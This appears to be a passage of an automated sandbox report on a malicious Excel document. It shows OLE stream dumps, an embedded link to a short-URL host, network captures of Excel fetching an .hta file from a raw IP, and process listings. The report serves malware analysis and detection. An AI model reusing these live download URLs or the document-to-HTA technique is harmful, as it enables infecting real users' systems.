                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . H < l - 9 . . . . . . . X . @ . . . . . . . . . .
                            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                            Stream Path: MBD00016417/\x1Ole, File Type: data, Stream Size: 694
                            General
                            Stream Path:MBD00016417/\x1Ole
                            CLSID:
                            File Type:data
                            Stream Size:694
                            Entropy:4.330652164987259
                            Base64 Encoded:False
                            Data ASCII:. . . . . ^ ^ . s . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . s . h . o . r . t . . . r . u . k . s . k . . . c . o . m . / . 2 . Z . P . t . 3 . M . ? . & . c . h . a . n . c . e . = . w . e . a . l . t . h . y . & . g . u . i . d . e . = . e . n . c . o . u . r . a . g . i . n . g . & . p . r . e . s . i . d . e . n . t . = . a . l . o . o . f . & . c . o . n . d . u . c . t . o . r . = . c . u . t . e . & . b . e . v . e . r . a . g . e . . . B . ^ p . g . . . . . . .
                            Data Raw:01 00 00 02 d3 18 f7 5e 5e cc a7 73 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b e4 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 68 00 6f 00 72 00 74 00 2e 00 72 00 75 00 6b 00 73 00 6b 00 2e 00 63 00 6f 00 6d 00 2f 00 32 00 5a 00 50 00 74 00 33 00 4d 00 3f 00 26 00 63 00 68 00 61 00 6e 00 63 00 65 00 3d 00 77 00
                            Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 335353
                            General
                            Stream Path:Workbook
                            CLSID:
                            File Type:Applesoft BASIC program data, first line number 16
                            Stream Size:335353
                            Entropy:7.998693399413816
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . h G ) D c . . # e d [ i p . ] r ( L . D . ] . I | . . . . . . . . . . . . . . \\ . p . . U ? r | t " / . > l . V ^ ' Q G . + ' . A . S % G | 2 + 7 . 9 W ^ B ` . s . x . . } . T . $ 0 ( m N | . . v M b ( = . ? [ _ B . . . ) > a . . . . 9 . . . = . . . o B . . . . . . . w - " h . C . . . \\ . . . . G . . . . L . . . . . . . . 1 . . . $ . = . . . 9 B b | z " . $ a . Q . ] @ . . . . ! . . . l " . . . . . . . . . $ . . . . . { . . . . 1 . . . e K . C t 7 + p
                            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 f4 da 96 fb 68 47 29 fa b3 44 63 f5 12 b6 14 23 90 65 64 ab 5b 69 94 70 e6 e7 0c 83 ec 5d b3 72 28 ad 4c 0d 44 c0 d0 7f 81 5d c9 0b f2 83 49 7c 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 0f e5 e2 00 00 00 5c 00 70 00 ba f4 93 d1 b2 55 3f 72 9f 7c 74 22 2f 01 3e c1 a2 6c 99 a5 2e 56 b3 5e a2 27
                            Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 529
                            General
                            Stream Path:_VBA_PROJECT_CUR/PROJECT
                            CLSID:
                            File Type:ASCII text, with CRLF line terminators
                            Stream Size:529
                            Entropy:5.224482078150177
                            Base64 Encoded:True
                            Data ASCII:I D = " { C 8 F B 9 E A 0 - 5 A E 8 - 4 5 2 1 - 9 A B 2 - F 3 A 0 5 B 3 6 D 7 C 9 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 2 3 0 3 E B E C 4 C 2 C 4 C 2 C
                            Data Raw:49 44 3d 22 7b 43 38 46 42 39 45 41 30 2d 35 41 45 38 2d 34 35 32 31 2d 39 41 42 32 2d 46 33 41 30 35 42 33 36 44 37 43 39 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                            Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                            General
                            Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                            CLSID:
                            File Type:data
                            Stream Size:104
                            Entropy:3.0488640812019017
                            Base64 Encoded:False
                            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                            Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                            Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                            CLSID:
                            File Type:data
                            Stream Size:2644
                            Entropy:3.994480955010925
                            Base64 Encoded:False
                            Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                            Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                            Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/dir
                            CLSID:
                            File Type:data
                            Stream Size:553
                            Entropy:6.372707223815173
                            Base64 Encoded:True
                            Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . 0 j i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                            Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 b8 30 6a 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Dec 10, 2024 06:48:29.833172083 CET49814443192.168.2.554.150.207.131
                            Dec 10, 2024 06:48:29.833209991 CET4434981454.150.207.131192.168.2.5
                            Dec 10, 2024 06:48:29.833277941 CET49814443192.168.2.554.150.207.131
                            Dec 10, 2024 06:48:29.833571911 CET49814443192.168.2.554.150.207.131
                            Dec 10, 2024 06:48:29.833590984 CET4434981454.150.207.131192.168.2.5
                            Dec 10, 2024 06:48:31.411421061 CET4434981454.150.207.131192.168.2.5
                            Dec 10, 2024 06:48:31.411528111 CET49814443192.168.2.554.150.207.131
                            Dec 10, 2024 06:48:31.419329882 CET49814443192.168.2.554.150.207.131
                            Dec 10, 2024 06:48:31.419348955 CET4434981454.150.207.131192.168.2.5
                            Dec 10, 2024 06:48:31.419711113 CET4434981454.150.207.131192.168.2.5
                            Dec 10, 2024 06:48:31.419764996 CET49814443192.168.2.554.150.207.131
                            Dec 10, 2024 06:48:31.420747995 CET49814443192.168.2.554.150.207.131
                            Dec 10, 2024 06:48:31.467329979 CET4434981454.150.207.131192.168.2.5
                            Dec 10, 2024 06:48:32.090646982 CET4434981454.150.207.131192.168.2.5
                            Dec 10, 2024 06:48:32.090720892 CET4434981454.150.207.131192.168.2.5
                            Dec 10, 2024 06:48:32.090751886 CET49814443192.168.2.554.150.207.131
                            Dec 10, 2024 06:48:32.090775013 CET49814443192.168.2.554.150.207.131
                            Dec 10, 2024 06:48:32.095455885 CET49814443192.168.2.554.150.207.131
                            Dec 10, 2024 06:48:32.095468998 CET4434981454.150.207.131192.168.2.5
                            Dec 10, 2024 06:48:32.097338915 CET4982080192.168.2.5172.245.123.29
                            Dec 10, 2024 06:48:32.217798948 CET8049820172.245.123.29192.168.2.5
                            Dec 10, 2024 06:48:32.217892885 CET4982080192.168.2.5172.245.123.29
                            Dec 10, 2024 06:48:32.218101978 CET4982080192.168.2.5172.245.123.29
                            Dec 10, 2024 06:48:32.337496996 CET8049820172.245.123.29192.168.2.5
                            Dec 10, 2024 06:48:33.352997065 CET8049820172.245.123.29192.168.2.5
                            Dec 10, 2024 06:48:33.353115082 CET4982080192.168.2.5172.245.123.29
                            Dec 10, 2024 06:48:38.358745098 CET8049820172.245.123.29192.168.2.5
                            Dec 10, 2024 06:48:38.358810902 CET4982080192.168.2.5172.245.123.29
                            Dec 10, 2024 06:49:29.355057001 CET4982080192.168.2.5172.245.123.29
                            Dec 10, 2024 06:49:29.474443913 CET8049820172.245.123.29192.168.2.5

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Dec 10, 2024 06:48:29.458331108 CET5256353192.168.2.51.1.1.1
                            Dec 10, 2024 06:48:29.832369089 CET53525631.1.1.1192.168.2.5
                            Dec 10, 2024 06:48:49.761110067 CET5451153192.168.2.51.1.1.1

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Dec 10, 2024 06:48:29.458331108 CET192.168.2.51.1.1.10xc496Standard query (0)short.ruksk.comA (IP address)IN (0x0001)false
                            Dec 10, 2024 06:48:49.761110067 CET192.168.2.51.1.1.10x85b6Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Dec 10, 2024 06:47:43.027987003 CET1.1.1.1192.168.2.50x5461No error (0)svc.ha-teams.office.commira-tmc.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                            Dec 10, 2024 06:47:43.027987003 CET1.1.1.1192.168.2.50x5461No error (0)mira-tmc.tm-4.office.com52.123.243.178A (IP address)IN (0x0001)false
                            Dec 10, 2024 06:47:43.027987003 CET1.1.1.1192.168.2.50x5461No error (0)mira-tmc.tm-4.office.com52.123.243.182A (IP address)IN (0x0001)false
                            Dec 10, 2024 06:47:43.027987003 CET1.1.1.1192.168.2.50x5461No error (0)mira-tmc.tm-4.office.com52.123.243.185A (IP address)IN (0x0001)false
                            Dec 10, 2024 06:47:43.027987003 CET1.1.1.1192.168.2.50x5461No error (0)mira-tmc.tm-4.office.com52.123.243.176A (IP address)IN (0x0001)false
                            Dec 10, 2024 06:47:43.027987003 CET1.1.1.1192.168.2.50x5461No error (0)mira-tmc.tm-4.office.com52.123.243.186A (IP address)IN (0x0001)false
                            Dec 10, 2024 06:47:43.027987003 CET1.1.1.1192.168.2.50x5461No error (0)mira-tmc.tm-4.office.com52.123.243.184A (IP address)IN (0x0001)false
                            Dec 10, 2024 06:47:43.027987003 CET1.1.1.1192.168.2.50x5461No error (0)mira-tmc.tm-4.office.com52.123.243.177A (IP address)IN (0x0001)false
                            Dec 10, 2024 06:47:43.027987003 CET1.1.1.1192.168.2.50x5461No error (0)mira-tmc.tm-4.office.com52.123.243.183A (IP address)IN (0x0001)false
                            Dec 10, 2024 06:47:45.038223028 CET1.1.1.1192.168.2.50xe5deNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                            Dec 10, 2024 06:47:45.038223028 CET1.1.1.1192.168.2.50xe5deNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                            Dec 10, 2024 06:47:51.903455019 CET1.1.1.1192.168.2.50x1c7aNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                            Dec 10, 2024 06:47:51.903455019 CET1.1.1.1192.168.2.50x1c7aNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                            Dec 10, 2024 06:48:29.832369089 CET1.1.1.1192.168.2.50xc496No error (0)short.ruksk.com54.150.207.131A (IP address)IN (0x0001)false
                            Dec 10, 2024 06:48:49.990004063 CET1.1.1.1192.168.2.50x85b6No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                            Dec 10, 2024 06:48:50.300677061 CET1.1.1.1192.168.2.50x84a2No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                            Dec 10, 2024 06:48:50.300677061 CET1.1.1.1192.168.2.50x84a2No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • short.ruksk.com
                            • 172.245.123.29

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.549820172.245.123.29807404C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            TimestampBytes transferredDirectionData
                            Dec 10, 2024 06:48:32.218101978 CET265OUTGET /221/wcc/shewithmegoodthingstogetmebackwithentirelifeiloveherwithheart.hta HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Connection: Keep-Alive
                            Host: 172.245.123.29
                            Dec 10, 2024 06:48:33.352997065 CET541INHTTP/1.1 404 Not Found
                            Date: Tue, 10 Dec 2024 05:48:33 GMT
                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                            Content-Length: 300
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 31 2e 32 35 20 53 65 72 76 65 72 20 61 74 20 31 37 32 2e 32 34 35 2e 31 32 33 2e 32 39 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Server at 172.245.123.29 Port 80</address></body></html>


                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.54981454.150.207.1314437404C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            TimestampBytes transferredDirectionData
                            2024-12-10 05:48:31 UTC273OUTGET /2ZPt3M?&chance=wealthy&guide=encouraging&president=aloof&conductor=cute&beverage HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Host: short.ruksk.com
                            Connection: Keep-Alive
                            2024-12-10 05:48:32 UTC509INHTTP/1.1 302 Found
                            Date: Tue, 10 Dec 2024 05:48:31 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            X-DNS-Prefetch-Control: off
                            X-Frame-Options: SAMEORIGIN
                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                            X-Download-Options: noopen
                            X-Content-Type-Options: nosniff
                            X-XSS-Protection: 1; mode=block
                            Location: http://172.245.123.29/221/wcc/shewithmegoodthingstogetmebackwithentirelifeiloveherwithheart.hta
                            Vary: Accept
                            Content-Type: text/plain; charset=utf-8
                            Content-Length: 117
                            Connection: close
                            2024-12-10 05:48:32 UTC117INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 34 35 2e 31 32 33 2e 32 39 2f 32 32 31 2f 77 63 63 2f 73 68 65 77 69 74 68 6d 65 67 6f 6f 64 74 68 69 6e 67 73 74 6f 67 65 74 6d 65 62 61 63 6b 77 69 74 68 65 6e 74 69 72 65 6c 69 66 65 69 6c 6f 76 65 68 65 72 77 69 74 68 68 65 61 72 74 2e 68 74 61
                            Data Ascii: Found. Redirecting to http://172.245.123.29/221/wcc/shewithmegoodthingstogetmebackwithentirelifeiloveherwithheart.hta


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:00:47:36
                            Start date:10/12/2024
                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                            Imagebase:0xf60000
                            File size:53'161'064 bytes
                            MD5 hash:4A871771235598812032C822E6F68F19
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:5
                            Start time:00:48:38
                            Start date:10/12/2024
                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" -Embedding
                            Imagebase:0x7ff686a00000
                            File size:5'641'176 bytes
                            MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:6
                            Start time:00:48:40
                            Start date:10/12/2024
                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                            Imagebase:0x7ff6413e0000
                            File size:3'581'912 bytes
                            MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:7
                            Start time:00:48:40
                            Start date:10/12/2024
                            Path:C:\Windows\splwow64.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\splwow64.exe 12288
                            Imagebase:0x7ff6741f0000
                            File size:163'840 bytes
                            MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:8
                            Start time:00:48:40
                            Start date:10/12/2024
                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2060 --field-trial-handle=1596,i,13638127103217919502,6718479426276192951,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                            Imagebase:0x7ff6413e0000
                            File size:3'581'912 bytes
                            MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:11
                            Start time:00:48:51
                            Start date:10/12/2024
                            Path:C:\Windows\splwow64.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\splwow64.exe 12288
                            Imagebase:0x7ff6741f0000
                            File size:163'840 bytes
                            MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:12
                            Start time:00:48:52
                            Start date:10/12/2024
                            Path:C:\Windows\splwow64.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\splwow64.exe 12288
                            Imagebase:0x7ff6741f0000
                            File size:163'840 bytes
                            MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:15
                            Start time:00:48:55
                            Start date:10/12/2024
                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\OrderSheet.xla.xlsx"
                            Imagebase:0xf60000
                            File size:53'161'064 bytes
                            MD5 hash:4A871771235598812032C822E6F68F19
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Disassembly

                            Code Analysis

                            Call Graph

                            • Entrypoint
                            • Decryption Function
                            • Executed
                            • Not Executed
                            • Show Help
                            callgraph 1 Error: Graph is empty

                            Module: Sheet1

                            Declaration
                            LineContent
                            1

                            Attribute VB_Name = "Sheet1"

                            2

                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                            3

                            Attribute VB_GlobalNameSpace = False

                            4

                            Attribute VB_Creatable = False

                            5

                            Attribute VB_PredeclaredId = True

                            6

                            Attribute VB_Exposed = True

                            7

                            Attribute VB_TemplateDerived = False

                            8

                            Attribute VB_Customizable = True

                            9

                            Attribute VB_Name = "Sheet1"

                            10

                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                            11

                            Attribute VB_GlobalNameSpace = False

                            12

                            Attribute VB_Creatable = False

                            13

                            Attribute VB_PredeclaredId = True

                            14

                            Attribute VB_Exposed = True

                            15

                            Attribute VB_TemplateDerived = False

                            16

                            Attribute VB_Customizable = True

                            Module: Sheet2

                            Declaration
                            LineContent
                            1

                            Attribute VB_Name = "Sheet2"

                            2

                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                            3

                            Attribute VB_GlobalNameSpace = False

                            4

                            Attribute VB_Creatable = False

                            5

                            Attribute VB_PredeclaredId = True

                            6

                            Attribute VB_Exposed = True

                            7

                            Attribute VB_TemplateDerived = False

                            8

                            Attribute VB_Customizable = True

                            9

                            Attribute VB_Name = "Sheet2"

                            10

                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                            11

                            Attribute VB_GlobalNameSpace = False

                            12

                            Attribute VB_Creatable = False

                            13

                            Attribute VB_PredeclaredId = True

                            14

                            Attribute VB_Exposed = True

                            15

                            Attribute VB_TemplateDerived = False

                            16

                            Attribute VB_Customizable = True

                            Module: ThisWorkbook

                            Declaration
                            LineContent
                            1

                            Attribute VB_Name = "ThisWorkbook"

                            2

                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                            3

                            Attribute VB_GlobalNameSpace = False

                            4

                            Attribute VB_Creatable = False

                            5

                            Attribute VB_PredeclaredId = True

                            6

                            Attribute VB_Exposed = True

                            7

                            Attribute VB_TemplateDerived = False

                            8

                            Attribute VB_Customizable = True

                            9

                            Attribute VB_Name = "ThisWorkbook"

                            10

                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                            11

                            Attribute VB_GlobalNameSpace = False

                            12

                            Attribute VB_Creatable = False

                            13

                            Attribute VB_PredeclaredId = True

                            14

                            Attribute VB_Exposed = True

                            15

                            Attribute VB_TemplateDerived = False

                            16

                            Attribute VB_Customizable = True

                            Reset < >